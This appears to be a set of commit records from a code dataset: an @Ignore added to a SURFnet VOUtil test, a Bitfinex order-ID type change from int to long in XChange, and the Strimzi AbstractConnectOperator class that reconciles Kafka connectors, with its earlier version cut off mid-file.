testGetVoName() throws Exception { VOUtil voUtil = new VOUtil(); TeamEnvironment environment = mock(TeamEnvironment.class); when(environment.getVoStemPrefix()).thenReturn(VOSTEMPREFIX); when(environment.getDefaultStemName()).thenReturn(DEFAULTSTEM); autoWireMock(voUtil, environment, TeamEnvironment.class); String stemName = voUtil.getStemName(getRequest()); assertEquals("nl:surfnet:diensten", stemName); } }
Fix test.. add @Ignore git-svn-id: 7f9817d80667deac6042fd45474745cdc98fb3cd@1496 3364c4cd-9065-40b6-aee7-261f90ce6533
coin-teams-war/src/test/java/nl/surfnet/coin/teams/util/VOUtilTest.java
Fix test.. add @Ignore
<ide><path>oin-teams-war/src/test/java/nl/surfnet/coin/teams/util/VOUtilTest.java <ide> package nl.surfnet.coin.teams.util; <ide> <ide> import nl.surfnet.coin.teams.control.AbstractControllerTest; <add>import org.junit.Ignore; <add>import org.junit.Test; <ide> <ide> import static org.junit.Assert.assertEquals; <ide> import static org.mockito.Mockito.mock; <ide> * <ide> * @throws Exception <ide> */ <del> //@Test <add> @Test <add> @Ignore <ide> //TODO fix test. Mock Static method VOInterceptor.getUserVo Otherwise the outcome of this test is not predictable! <ide> public void testGetVoName() throws Exception { <ide>
Java
mit
34b3b8d6478b4eb6c627ca336fb7c6eff6253916
0
douggie/XChange,ww3456/XChange,timmolter/XChange,npomfret/XChange,andre77/XChange,stachon/XChange,Panchen/XChange,LeonidShamis/XChange,gaborkolozsy/XChange,evdubs/XChange,nopy/XChange,anwfr/XChange,TSavo/XChange,chrisrico/XChange
package org.knowm.xchange.bitfinex.v1.dto.trade; import com.fasterxml.jackson.annotation.JsonProperty; import com.fasterxml.jackson.annotation.JsonRawValue; public class BitfinexOfferStatusRequest { @JsonProperty("request") protected String request; @JsonProperty("nonce") protected String nonce; @JsonProperty("order_id") @JsonRawValue private long orderId; public BitfinexOfferStatusRequest(String nonce, long orderId) { this.request = "/v1/offer/status"; this.orderId = orderId; this.nonce = nonce; } public String getOrderId() { return String.valueOf(orderId); } }
xchange-bitfinex/src/main/java/org/knowm/xchange/bitfinex/v1/dto/trade/BitfinexOfferStatusRequest.java
package org.knowm.xchange.bitfinex.v1.dto.trade; import com.fasterxml.jackson.annotation.JsonProperty; import com.fasterxml.jackson.annotation.JsonRawValue; public class BitfinexOfferStatusRequest { @JsonProperty("request") protected String request; @JsonProperty("nonce") protected String nonce; @JsonProperty("order_id") @JsonRawValue private int orderId; public BitfinexOfferStatusRequest(String nonce, int orderId) { this.request = "/v1/offer/status"; this.orderId = orderId; this.nonce = nonce; } public String getOrderId() { return String.valueOf(orderId); } }
Update BitfinexOfferStatusRequest.java
xchange-bitfinex/src/main/java/org/knowm/xchange/bitfinex/v1/dto/trade/BitfinexOfferStatusRequest.java
Update BitfinexOfferStatusRequest.java
<ide><path>change-bitfinex/src/main/java/org/knowm/xchange/bitfinex/v1/dto/trade/BitfinexOfferStatusRequest.java <ide> <ide> @JsonProperty("order_id") <ide> @JsonRawValue <del> private int orderId; <add> private long orderId; <ide> <del> public BitfinexOfferStatusRequest(String nonce, int orderId) { <add> public BitfinexOfferStatusRequest(String nonce, long orderId) { <ide> <ide> this.request = "/v1/offer/status"; <ide> this.orderId = orderId;
Java
apache-2.0
e52963c3f2c99a5433a553cabc75b187ad9b0091
0
scholzj/barnabas,ppatierno/kaas,scholzj/barnabas,ppatierno/kaas
/* * Copyright Strimzi authors. * License: Apache License 2.0 (see the file LICENSE or http://apache.org/licenses/LICENSE-2.0.html). */ package io.strimzi.operator.cluster.operator.assembly; import io.fabric8.kubernetes.api.model.Doneable; import io.fabric8.kubernetes.api.model.HasMetadata; import io.fabric8.kubernetes.api.model.LabelSelectorBuilder; import io.fabric8.kubernetes.api.model.LocalObjectReference; import io.fabric8.kubernetes.client.CustomResource; import io.fabric8.kubernetes.client.CustomResourceList; import io.fabric8.kubernetes.client.KubernetesClient; import io.fabric8.kubernetes.client.KubernetesClientException; import io.fabric8.kubernetes.client.Watcher; import io.fabric8.kubernetes.client.dsl.Resource; import io.fabric8.openshift.client.OpenShiftClient; import io.strimzi.api.kafka.KafkaConnectList; import io.strimzi.api.kafka.KafkaConnectS2IList; import io.strimzi.api.kafka.KafkaConnectorList; import io.strimzi.api.kafka.model.DoneableKafkaConnect; import io.strimzi.api.kafka.model.DoneableKafkaConnectS2I; import io.strimzi.api.kafka.model.DoneableKafkaConnector; import io.strimzi.api.kafka.model.KafkaConnect; import io.strimzi.api.kafka.model.KafkaConnectResources; import io.strimzi.api.kafka.model.KafkaConnectS2I; import io.strimzi.api.kafka.model.KafkaConnector; import io.strimzi.api.kafka.model.KafkaConnectorBuilder; import io.strimzi.api.kafka.model.KafkaConnectorSpec; import io.strimzi.api.kafka.model.status.HasStatus; import io.strimzi.api.kafka.model.status.KafkaConnectorStatus; import io.strimzi.api.kafka.model.status.Status; import io.strimzi.operator.PlatformFeaturesAvailability; import io.strimzi.operator.cluster.ClusterOperatorConfig; import io.strimzi.operator.cluster.model.ImagePullPolicy; import io.strimzi.operator.cluster.model.InvalidResourceException; import io.strimzi.operator.cluster.model.KafkaConnectCluster; import io.strimzi.operator.cluster.model.NoSuchResourceException; import io.strimzi.operator.cluster.model.StatusDiff; import io.strimzi.operator.cluster.operator.resource.ResourceOperatorSupplier; import io.strimzi.operator.common.AbstractOperator; import io.strimzi.operator.common.Annotations; import io.strimzi.operator.common.BackOff; import io.strimzi.operator.common.Reconciliation; import io.strimzi.operator.common.Util; import io.strimzi.operator.common.model.Labels; import io.strimzi.operator.common.operator.resource.ConfigMapOperator; import io.strimzi.operator.common.operator.resource.CrdOperator; import io.strimzi.operator.common.operator.resource.PodDisruptionBudgetOperator; import io.strimzi.operator.common.operator.resource.ServiceAccountOperator; import io.strimzi.operator.common.operator.resource.ServiceOperator; import io.strimzi.operator.common.operator.resource.StatusUtils; import io.vertx.core.CompositeFuture; import io.vertx.core.Future; import io.vertx.core.Promise; import io.vertx.core.Vertx; import io.vertx.core.json.JsonObject; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import java.util.ArrayList; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import java.util.function.BiFunction; import java.util.function.Function; import java.util.stream.Collectors; import java.util.stream.Stream; import static java.util.Collections.emptyMap; public abstract class AbstractConnectOperator<C extends KubernetesClient, T extends CustomResource, L extends CustomResourceList<T>, D extends Doneable<T>, R extends Resource<T, D>> extends AbstractOperator<T, CrdOperator<C, T, L, D>> { private static final Logger log = LogManager.getLogger(AbstractConnectOperator.class.getName()); public static final String STRIMZI_IO_USE_CONNECTOR_RESOURCES = "strimzi.io/use-connector-resources"; private final CrdOperator<KubernetesClient, KafkaConnector, KafkaConnectorList, DoneableKafkaConnector> connectorOperator; private final Function<Vertx, KafkaConnectApi> connectClientProvider; protected final ImagePullPolicy imagePullPolicy; protected final ConfigMapOperator configMapOperations; protected final ServiceOperator serviceOperations; protected final PodDisruptionBudgetOperator podDisruptionBudgetOperator; protected final List<LocalObjectReference> imagePullSecrets; protected final long operationTimeoutMs; protected final PlatformFeaturesAvailability pfa; protected final ServiceAccountOperator serviceAccountOperations; public AbstractConnectOperator(Vertx vertx, PlatformFeaturesAvailability pfa, String kind, CrdOperator<C, T, L, D> resourceOperator, ResourceOperatorSupplier supplier, ClusterOperatorConfig config, Function<Vertx, KafkaConnectApi> connectClientProvider) { super(vertx, kind, resourceOperator); this.connectorOperator = supplier.kafkaConnectorOperator; this.connectClientProvider = connectClientProvider; this.configMapOperations = supplier.configMapOperations; this.serviceOperations = supplier.serviceOperations; this.serviceAccountOperations = supplier.serviceAccountOperations; this.podDisruptionBudgetOperator = supplier.podDisruptionBudgetOperator; this.imagePullPolicy = config.getImagePullPolicy(); this.imagePullSecrets = config.getImagePullSecrets(); this.operationTimeoutMs = config.getOperationTimeoutMs(); this.pfa = pfa; } @Override protected Future<Boolean> delete(Reconciliation reconciliation) { // When deleting KafkaConnect we need to update the status of all selected KafkaConnector return connectorOperator.listAsync(reconciliation.namespace(), Labels.forCluster(reconciliation.name())).compose(connectors -> { List<Future> connectorFutures = new ArrayList<>(); for (KafkaConnector connector : connectors) { connectorFutures.add(maybeUpdateConnectorStatus(reconciliation, connector, null, noConnectCluster(reconciliation.namespace(), reconciliation.name()))); } return CompositeFuture.join(connectorFutures); }).map(ignored -> Boolean.FALSE); } /** * Create a watch on {@code KafkaConnector} in the given {@code namespace}. * The watcher will: * <ul> * <li>{@link #reconcileConnectors(Reconciliation, CustomResource)} on the KafkaConnect or KafkaConnectS2I * identified by {@code KafkaConnector.metadata.labels[strimzi.io/cluster]}.</li> * <li>If there is a Connect and ConnectS2I cluster with the given name then the plain Connect one is used * (and an error is logged about the ambiguity).</li> * <li>The {@code KafkaConnector} status is updated with the result.</li> * </ul> * @param connectOperator The operator for {@code KafkaConnect}. * @param connectS2IOperator The operator for {@code KafkaConnectS2I}. * @param watchNamespaceOrWildcard The namespace to watch. * @return A future which completes when the watch has been set up. */ public static Future<Void> createConnectorWatch(AbstractConnectOperator<KubernetesClient, KafkaConnect, KafkaConnectList, DoneableKafkaConnect, Resource<KafkaConnect, DoneableKafkaConnect>> connectOperator, AbstractConnectOperator<OpenShiftClient, KafkaConnectS2I, KafkaConnectS2IList, DoneableKafkaConnectS2I, Resource<KafkaConnectS2I, DoneableKafkaConnectS2I>> connectS2IOperator, String watchNamespaceOrWildcard) { return Util.async(connectOperator.vertx, () -> { connectOperator.connectorOperator.watch(watchNamespaceOrWildcard, new Watcher<KafkaConnector>() { @Override public void eventReceived(Action action, KafkaConnector kafkaConnector) { String connectorName = kafkaConnector.getMetadata().getName(); String connectorNamespace = kafkaConnector.getMetadata().getNamespace(); String connectorKind = kafkaConnector.getKind(); String connectName = kafkaConnector.getMetadata().getLabels() == null ? null : kafkaConnector.getMetadata().getLabels().get(Labels.STRIMZI_CLUSTER_LABEL); String connectNamespace = connectorNamespace; switch (action) { case ADDED: case DELETED: case MODIFIED: Future<Void> f; if (connectName != null) { // Check whether a KafkaConnect/S2I exists CompositeFuture.join(connectOperator.resourceOperator.getAsync(connectNamespace, connectName), connectOperator.pfa.supportsS2I() ? connectS2IOperator.resourceOperator.getAsync(connectNamespace, connectName) : Future.succeededFuture()) .compose(cf -> { KafkaConnect connect = cf.resultAt(0); KafkaConnectS2I connectS2i = cf.resultAt(1); KafkaConnectApi apiClient = connectOperator.connectClientProvider.apply(connectOperator.vertx); if (connect == null && connectS2i == null) { log.info("{} {} in namespace {} was {}, but Connect cluster {} does not exist", connectorKind, connectorName, connectorNamespace, action, connectName); updateStatus(noConnectCluster(connectNamespace, connectName), kafkaConnector, connectOperator.connectorOperator); return Future.succeededFuture(); } else if (connect != null) { // grab the lock and call reconcileConnectors() // (i.e. short circuit doing a whole KafkaConnect reconciliation). Reconciliation reconciliation = new Reconciliation("connector-watch", connectOperator.kind(), kafkaConnector.getMetadata().getNamespace(), connectName); log.info("{}: {} {} in namespace {} was {}", reconciliation, connectorKind, connectorName, connectorNamespace, action); if (connectS2i != null) { log.warn("{}: There is both a KafkaConnect resource and a KafkaConnectS2I resource named {}. " + "The KafkaConnect takes precedence for the connector {}", reconciliation, connectName, connect.getMetadata().getName()); } return connectOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, () -> connectOperator.reconcileConnector(reconciliation, KafkaConnectResources.serviceName(connectName), apiClient, isUseResources(connect), kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector) .compose(reconcileResult -> { log.info("{}: reconciled", reconciliation); return Future.succeededFuture(reconcileResult); })); } else { // grab the lock and call reconcileConnectors() // (i.e. short circuit doing a whole KafkaConnect reconciliation). Reconciliation reconciliation = new Reconciliation("connector-watch", connectS2IOperator.kind(), kafkaConnector.getMetadata().getNamespace(), connectName); log.info("{}: {} {} in namespace {} was {}", reconciliation, connectorKind, connectorName, connectorNamespace, action); return connectS2IOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, () -> connectS2IOperator.reconcileConnector(reconciliation, KafkaConnectResources.serviceName(connectName), apiClient, isUseResources(connectS2i), kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector) .compose(reconcileResult -> { log.info("{}: reconciled", reconciliation); return Future.succeededFuture(reconcileResult); })); } }); } else { updateStatus(new InvalidResourceException("Resource lacks label '" + Labels.STRIMZI_CLUSTER_LABEL + "': No connect cluster in which to create this connector."), kafkaConnector, connectOperator.connectorOperator); } break; case ERROR: log.error("Failed {} {} in namespace {} ", connectorKind, connectorName, connectorNamespace); break; default: log.error("Unknown action: {} {} in namespace {}", connectorKind, connectorName, connectorNamespace); } } @Override public void onClose(KubernetesClientException e) { if (e != null) { throw e; } } }); return null; }); } public static boolean isUseResources(HasMetadata connect) { return Annotations.booleanAnnotation(connect, STRIMZI_IO_USE_CONNECTOR_RESOURCES, false); } private static NoSuchResourceException noConnectCluster(String connectNamespace, String connectName) { return new NoSuchResourceException( "KafkaConnect resource '" + connectName + "' identified by label '" + Labels.STRIMZI_CLUSTER_LABEL + "' does not exist in namespace " + connectNamespace + "."); } /** * Reconcile all the connectors selected by the given connect instance, updated each connectors status with the result. * @param reconciliation The reconciliation * @param connect The connector * @return A future, failed if any of the connectors' statuses could not be updated. */ protected Future<Void> reconcileConnectors(Reconciliation reconciliation, T connect) { String connectName = connect.getMetadata().getName(); String namespace = connect.getMetadata().getNamespace(); String host = KafkaConnectResources.serviceName(connectName); KafkaConnectApi apiClient = connectClientProvider.apply(vertx); boolean useResources = isUseResources(connect); return CompositeFuture.join(apiClient.list(host, KafkaConnectCluster.REST_API_PORT), connectorOperator.listAsync(namespace, Optional.of(new LabelSelectorBuilder().addToMatchLabels(Labels.STRIMZI_CLUSTER_LABEL, connectName).build())) ).compose(cf -> { List<String> runningConnectorNames = cf.resultAt(0); List<KafkaConnector> desiredConnectors = cf.resultAt(1); log.debug("{}: {} cluster: required connectors: {}", reconciliation, kind(), desiredConnectors); Set<String> deleteConnectorNames = new HashSet<>(runningConnectorNames); deleteConnectorNames.removeAll(desiredConnectors.stream().map(c -> c.getMetadata().getName()).collect(Collectors.toSet())); log.debug("{}: {} cluster: delete connectors: {}", reconciliation, kind(), deleteConnectorNames); Stream<Future<Void>> deletionFutures = deleteConnectorNames.stream().map(connectorName -> reconcileConnector(reconciliation, host, apiClient, useResources, connectorName, null) ); Stream<Future<Void>> createUpdateFutures = desiredConnectors.stream() .map(connector -> reconcileConnector(reconciliation, host, apiClient, useResources, connector.getMetadata().getName(), connector)); return CompositeFuture.join(Stream.concat(deletionFutures, createUpdateFutures).collect(Collectors.toList())).map((Void) null); }); } private Future<Void> reconcileConnector(Reconciliation reconciliation, String host, KafkaConnectApi apiClient, boolean useResources, String connectorName, KafkaConnector connector) { if (connector == null) { if (useResources) { log.info("{}: deleting connector: {}", reconciliation, connectorName); return apiClient.delete(host, KafkaConnectCluster.REST_API_PORT, connectorName); } else { return Future.succeededFuture(); } } else { log.info("{}: creating/updating connector: {}", reconciliation, connectorName); if (connector.getSpec() == null) { return maybeUpdateConnectorStatus(reconciliation, connector, null, new InvalidResourceException("spec property is required")); } if (!useResources) { return maybeUpdateConnectorStatus(reconciliation, connector, null, new NoSuchResourceException(reconciliation.kind() + " " + reconciliation.name() + " is not configured with annotation " + STRIMZI_IO_USE_CONNECTOR_RESOURCES)); } else { Promise<Void> promise = Promise.promise(); apiClient.createOrUpdatePutRequest(host, KafkaConnectCluster.REST_API_PORT, connectorName, asJson(connector.getSpec())) .compose(ignored -> apiClient.statusWithBackOff(new BackOff(200L, 2, 6), host, KafkaConnectCluster.REST_API_PORT, connectorName)) .compose(status -> { Object path = ((Map) status.getOrDefault("connector", emptyMap())).get("state"); if (!(path instanceof String)) { return Future.failedFuture("JSON response lacked $.connector.state"); } else { String state = (String) path; boolean shouldPause = Boolean.TRUE.equals(connector.getSpec().getPause()); if ("RUNNING".equals(state) && shouldPause) { log.debug("{}: Pausing connector {}", reconciliation, connectorName); return apiClient.pause(host, KafkaConnectCluster.REST_API_PORT, connectorName) .compose(ignored -> apiClient.status(host, KafkaConnectCluster.REST_API_PORT, connectorName)); } else if ("PAUSED".equals(state) && !shouldPause) { log.debug("{}: Resuming connector {}", reconciliation, connectorName); return apiClient.resume(host, KafkaConnectCluster.REST_API_PORT, connectorName) .compose(ignored -> apiClient.status(host, KafkaConnectCluster.REST_API_PORT, connectorName)); } else { return Future.succeededFuture(status); } } }) .setHandler(result -> { if (result.succeeded()) { maybeUpdateConnectorStatus(reconciliation, connector, result.result(), null); } else { maybeUpdateConnectorStatus(reconciliation, connector, result.result(), result.cause()); } promise.complete(); }); return promise.future(); } } } public static void updateStatus(Throwable error, KafkaConnector kafkaConnector2, CrdOperator<?, KafkaConnector, ?, ?> connectorOperations) { KafkaConnectorStatus status = new KafkaConnectorStatus(); StatusUtils.setStatusConditionAndObservedGeneration(kafkaConnector2, status, error); StatusDiff diff = new StatusDiff(kafkaConnector2.getStatus(), status); if (!diff.isEmpty()) { KafkaConnector copy = new KafkaConnectorBuilder(kafkaConnector2).build(); copy.setStatus(status); connectorOperations.updateStatusAsync(copy); } } Future<Void> maybeUpdateConnectorStatus(Reconciliation reconciliation, KafkaConnector connector, Map<String, Object> statusResult, Throwable error) { KafkaConnectorStatus status = new KafkaConnectorStatus(); if (error != null) { log.warn("{}: Error reconciling connector {}", reconciliation, connector.getMetadata().getName(), error); } StatusUtils.setStatusConditionAndObservedGeneration(connector, status, error != null ? Future.failedFuture(error) : Future.succeededFuture()); status.setConnectorStatus(statusResult); return maybeUpdateStatusCommon(connectorOperator, connector, reconciliation, status, (connector1, status1) -> { return new KafkaConnectorBuilder(connector1).withStatus(status1).build(); }); } private JsonObject asJson(KafkaConnectorSpec spec) { JsonObject connectorConfigJson = new JsonObject(); if (spec.getConfig() != null) { for (Map.Entry<String, Object> cf : spec.getConfig().entrySet()) { String name = cf.getKey(); if ("connector.class".equals(name) || "tasks.max".equals(name)) { // TODO include resource namespace and name in this message log.warn("Configuration parameter {} in KafkaConnector.spec.config will be ignored and the value from KafkaConnector.spec will be used instead", name); } connectorConfigJson.put(name, cf.getValue()); } } return connectorConfigJson .put("connector.class", spec.getClassName()) .put("tasks.max", spec.getTasksMax()); } /** * Updates the Status field of the KafkaConnect or KafkaConnector CR. It diffs the desired status against the current status and calls * the update only when there is any difference in non-timestamp fields. * * @param resource The CR of KafkaConnect or KafkaConnector * @param reconciliation Reconciliation information * @param desiredStatus The KafkaConnectStatus or KafkaConnectorStatus which should be set * * @return */ protected <T extends CustomResource & HasStatus<S>, S extends Status, L extends CustomResourceList<T>, D extends Doneable<T>> Future<Void> maybeUpdateStatusCommon(CrdOperator<KubernetesClient, T, L, D> resourceOperator, T resource, Reconciliation reconciliation, S desiredStatus, BiFunction<T, S, T> copyWithStatus) { Promise<Void> updateStatusPromise = Promise.promise(); resourceOperator.getAsync(resource.getMetadata().getNamespace(), resource.getMetadata().getName()).setHandler(getRes -> { if (getRes.succeeded()) { T fetchedResource = getRes.result(); if (fetchedResource != null) { if ((!(fetchedResource instanceof KafkaConnector)) && StatusUtils.isResourceV1alpha1(fetchedResource)) { log.warn("{}: {} {} needs to be upgraded from version {} to 'v1beta1' to use the status field", reconciliation, fetchedResource.getKind(), fetchedResource.getMetadata().getName(), fetchedResource.getApiVersion()); updateStatusPromise.complete(); } else { S currentStatus = fetchedResource.getStatus(); StatusDiff ksDiff = new StatusDiff(currentStatus, desiredStatus); if (!ksDiff.isEmpty()) { T resourceWithNewStatus = copyWithStatus.apply(fetchedResource, desiredStatus); resourceOperator.updateStatusAsync(resourceWithNewStatus).setHandler(updateRes -> { if (updateRes.succeeded()) { log.debug("{}: Completed status update", reconciliation); updateStatusPromise.complete(); } else { log.error("{}: Failed to update status", reconciliation, updateRes.cause()); updateStatusPromise.fail(updateRes.cause()); } }); } else { log.debug("{}: Status did not change", reconciliation); updateStatusPromise.complete(); } } } else { log.error("{}: Current {} resource not found", reconciliation, resource.getKind()); updateStatusPromise.fail("Current " + resource.getKind() + " resource not found"); } } else { log.error("{}: Failed to get the current {} resource and its status", reconciliation, resource.getKind(), getRes.cause()); updateStatusPromise.fail(getRes.cause()); } }); return updateStatusPromise.future(); } }
cluster-operator/src/main/java/io/strimzi/operator/cluster/operator/assembly/AbstractConnectOperator.java
/* * Copyright Strimzi authors. * License: Apache License 2.0 (see the file LICENSE or http://apache.org/licenses/LICENSE-2.0.html). */ package io.strimzi.operator.cluster.operator.assembly; import io.fabric8.kubernetes.api.model.Doneable; import io.fabric8.kubernetes.api.model.HasMetadata; import io.fabric8.kubernetes.api.model.LabelSelectorBuilder; import io.fabric8.kubernetes.api.model.LocalObjectReference; import io.fabric8.kubernetes.client.CustomResource; import io.fabric8.kubernetes.client.CustomResourceList; import io.fabric8.kubernetes.client.KubernetesClient; import io.fabric8.kubernetes.client.KubernetesClientException; import io.fabric8.kubernetes.client.Watcher; import io.fabric8.kubernetes.client.dsl.Resource; import io.fabric8.openshift.client.OpenShiftClient; import io.strimzi.api.kafka.KafkaConnectList; import io.strimzi.api.kafka.KafkaConnectS2IList; import io.strimzi.api.kafka.KafkaConnectorList; import io.strimzi.api.kafka.model.DoneableKafkaConnect; import io.strimzi.api.kafka.model.DoneableKafkaConnectS2I; import io.strimzi.api.kafka.model.DoneableKafkaConnector; import io.strimzi.api.kafka.model.KafkaConnect; import io.strimzi.api.kafka.model.KafkaConnectResources; import io.strimzi.api.kafka.model.KafkaConnectS2I; import io.strimzi.api.kafka.model.KafkaConnector; import io.strimzi.api.kafka.model.KafkaConnectorBuilder; import io.strimzi.api.kafka.model.KafkaConnectorSpec; import io.strimzi.api.kafka.model.status.HasStatus; import io.strimzi.api.kafka.model.status.KafkaConnectorStatus; import io.strimzi.api.kafka.model.status.Status; import io.strimzi.operator.PlatformFeaturesAvailability; import io.strimzi.operator.cluster.ClusterOperatorConfig; import io.strimzi.operator.cluster.model.ImagePullPolicy; import io.strimzi.operator.cluster.model.InvalidResourceException; import io.strimzi.operator.cluster.model.KafkaConnectCluster; import io.strimzi.operator.cluster.model.NoSuchResourceException; import io.strimzi.operator.cluster.model.StatusDiff; import io.strimzi.operator.cluster.operator.resource.ResourceOperatorSupplier; import io.strimzi.operator.common.AbstractOperator; import io.strimzi.operator.common.Annotations; import io.strimzi.operator.common.BackOff; import io.strimzi.operator.common.Reconciliation; import io.strimzi.operator.common.Util; import io.strimzi.operator.common.model.Labels; import io.strimzi.operator.common.operator.resource.ConfigMapOperator; import io.strimzi.operator.common.operator.resource.CrdOperator; import io.strimzi.operator.common.operator.resource.PodDisruptionBudgetOperator; import io.strimzi.operator.common.operator.resource.ServiceAccountOperator; import io.strimzi.operator.common.operator.resource.ServiceOperator; import io.strimzi.operator.common.operator.resource.StatusUtils; import io.vertx.core.CompositeFuture; import io.vertx.core.Future; import io.vertx.core.Promise; import io.vertx.core.Vertx; import io.vertx.core.json.JsonObject; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import java.util.ArrayList; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import java.util.function.BiFunction; import java.util.function.Function; import java.util.stream.Collectors; import java.util.stream.Stream; import static java.util.Collections.emptyMap; public abstract class AbstractConnectOperator<C extends KubernetesClient, T extends CustomResource, L extends CustomResourceList<T>, D extends Doneable<T>, R extends Resource<T, D>> extends AbstractOperator<T, CrdOperator<C, T, L, D>> { private static final Logger log = LogManager.getLogger(AbstractConnectOperator.class.getName()); public static final String STRIMZI_IO_USE_CONNECTOR_RESOURCES = "strimzi.io/use-connector-resources"; private final CrdOperator<KubernetesClient, KafkaConnector, KafkaConnectorList, DoneableKafkaConnector> connectorOperator; private final Function<Vertx, KafkaConnectApi> connectClientProvider; protected final ImagePullPolicy imagePullPolicy; protected final ConfigMapOperator configMapOperations; protected final ServiceOperator serviceOperations; protected final PodDisruptionBudgetOperator podDisruptionBudgetOperator; protected final List<LocalObjectReference> imagePullSecrets; protected final long operationTimeoutMs; protected final PlatformFeaturesAvailability pfa; protected final ServiceAccountOperator serviceAccountOperations; public AbstractConnectOperator(Vertx vertx, PlatformFeaturesAvailability pfa, String kind, CrdOperator<C, T, L, D> resourceOperator, ResourceOperatorSupplier supplier, ClusterOperatorConfig config, Function<Vertx, KafkaConnectApi> connectClientProvider) { super(vertx, kind, resourceOperator); this.connectorOperator = supplier.kafkaConnectorOperator; this.connectClientProvider = connectClientProvider; this.configMapOperations = supplier.configMapOperations; this.serviceOperations = supplier.serviceOperations; this.serviceAccountOperations = supplier.serviceAccountOperations; this.podDisruptionBudgetOperator = supplier.podDisruptionBudgetOperator; this.imagePullPolicy = config.getImagePullPolicy(); this.imagePullSecrets = config.getImagePullSecrets(); this.operationTimeoutMs = config.getOperationTimeoutMs(); this.pfa = pfa; } @Override protected Future<Boolean> delete(Reconciliation reconciliation) { // When deleting KafkaConnect we need to update the status of all selected KafkaConnector return connectorOperator.listAsync(reconciliation.namespace(), Labels.forCluster(reconciliation.name())).compose(connectors -> { List<Future> connectorFutures = new ArrayList<>(); for (KafkaConnector connector : connectors) { connectorFutures.add(maybeUpdateConnectorStatus(reconciliation, connector, null, noConnectCluster(reconciliation.namespace(), reconciliation.name()))); } return CompositeFuture.join(connectorFutures); }).map(ignored -> Boolean.FALSE); } /** * Create a watch on {@code KafkaConnector} in the given {@code namespace}. * The watcher will: * <ul> * <li>{@link #reconcileConnectors(Reconciliation, CustomResource)} on the KafkaConnect or KafkaConnectS2I * identified by {@code KafkaConnector.metadata.labels[strimzi.io/cluster]}.</li> * <li>If there is a Connect and ConnectS2I cluster with the given name then the plain Connect one is used * (and an error is logged about the ambiguity).</li> * <li>The {@code KafkaConnector} status is updated with the result.</li> * </ul> * @param connectOperator The operator for {@code KafkaConnect}. * @param connectS2IOperator The operator for {@code KafkaConnectS2I}. * @param watchNamespaceOrWildcard The namespace to watch. * @return A future which completes when the watch has been set up. */ public static Future<Void> createConnectorWatch(AbstractConnectOperator<KubernetesClient, KafkaConnect, KafkaConnectList, DoneableKafkaConnect, Resource<KafkaConnect, DoneableKafkaConnect>> connectOperator, AbstractConnectOperator<OpenShiftClient, KafkaConnectS2I, KafkaConnectS2IList, DoneableKafkaConnectS2I, Resource<KafkaConnectS2I, DoneableKafkaConnectS2I>> connectS2IOperator, String watchNamespaceOrWildcard) { return Util.async(connectOperator.vertx, () -> { connectOperator.connectorOperator.watch(watchNamespaceOrWildcard, new Watcher<KafkaConnector>() { @Override public void eventReceived(Action action, KafkaConnector kafkaConnector) { String connectName = kafkaConnector.getMetadata().getLabels() == null ? null : kafkaConnector.getMetadata().getLabels().get(Labels.STRIMZI_CLUSTER_LABEL); String connectorNamespace = kafkaConnector.getMetadata().getNamespace(); String connectNamespace = connectorNamespace; Future<Void> f; if (connectName != null) { // Check whether a KafkaConnect/S2I exists CompositeFuture.join(connectOperator.resourceOperator.getAsync(connectNamespace, connectName), connectOperator.pfa.supportsS2I() ? connectS2IOperator.resourceOperator.getAsync(connectNamespace, connectName) : Future.succeededFuture()) .compose(cf -> { KafkaConnect connect = cf.resultAt(0); KafkaConnectS2I connectS2i = cf.resultAt(1); KafkaConnectApi apiClient = connectOperator.connectClientProvider.apply(connectOperator.vertx); if (connect == null && connectS2i == null) { updateStatus(noConnectCluster(connectNamespace, connectName), kafkaConnector, connectOperator.connectorOperator); return Future.succeededFuture(); } else if (connect != null) { // grab the lock and call reconcileConnectors() // (i.e. short circuit doing a whole KafkaConnect reconciliation). Reconciliation reconciliation = new Reconciliation("connector-watch", connectOperator.kind(), kafkaConnector.getMetadata().getNamespace(), connectName); if (connectS2i != null) { log.warn("{}: There is both a KafkaConnect resource and a KafkaConnectS2I resource named {}. " + "The KafkaConnect takes precedence for the connector {}", reconciliation, connectName, connect.getMetadata().getName()); } return connectOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, () -> connectOperator.reconcileConnector(reconciliation, KafkaConnectResources.serviceName(connectName), apiClient, isUseResources(connect), kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector)); } else { // grab the lock and call reconcileConnectors() // (i.e. short circuit doing a whole KafkaConnect reconciliation). Reconciliation r = new Reconciliation("connector-watch", connectS2IOperator.kind(), kafkaConnector.getMetadata().getNamespace(), connectName); return connectS2IOperator.withLock(r, LOCK_TIMEOUT_MS, () -> connectS2IOperator.reconcileConnector(r, KafkaConnectResources.serviceName(connectName), apiClient, isUseResources(connectS2i), kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector)); } } ); } else { updateStatus(new InvalidResourceException("Resource lacks label '" + Labels.STRIMZI_CLUSTER_LABEL + "': No connect cluster in which to create this connector."), kafkaConnector, connectOperator.connectorOperator); } } @Override public void onClose(KubernetesClientException e) { if (e != null) { throw e; } } }); return null; }); } public static boolean isUseResources(HasMetadata connect) { return Annotations.booleanAnnotation(connect, STRIMZI_IO_USE_CONNECTOR_RESOURCES, false); } private static NoSuchResourceException noConnectCluster(String connectNamespace, String connectName) { return new NoSuchResourceException( "KafkaConnect resource '" + connectName + "' identified by label '" + Labels.STRIMZI_CLUSTER_LABEL + "' does not exist in namespace " + connectNamespace + "."); } /** * Reconcile all the connectors selected by the given connect instance, updated each connectors status with the result. * @param reconciliation The reconciliation * @param connect The connector * @return A future, failed if any of the connectors' statuses could not be updated. */ protected Future<Void> reconcileConnectors(Reconciliation reconciliation, T connect) { String connectName = connect.getMetadata().getName(); String namespace = connect.getMetadata().getNamespace(); String host = KafkaConnectResources.serviceName(connectName); KafkaConnectApi apiClient = connectClientProvider.apply(vertx); boolean useResources = isUseResources(connect); return CompositeFuture.join(apiClient.list(host, KafkaConnectCluster.REST_API_PORT), 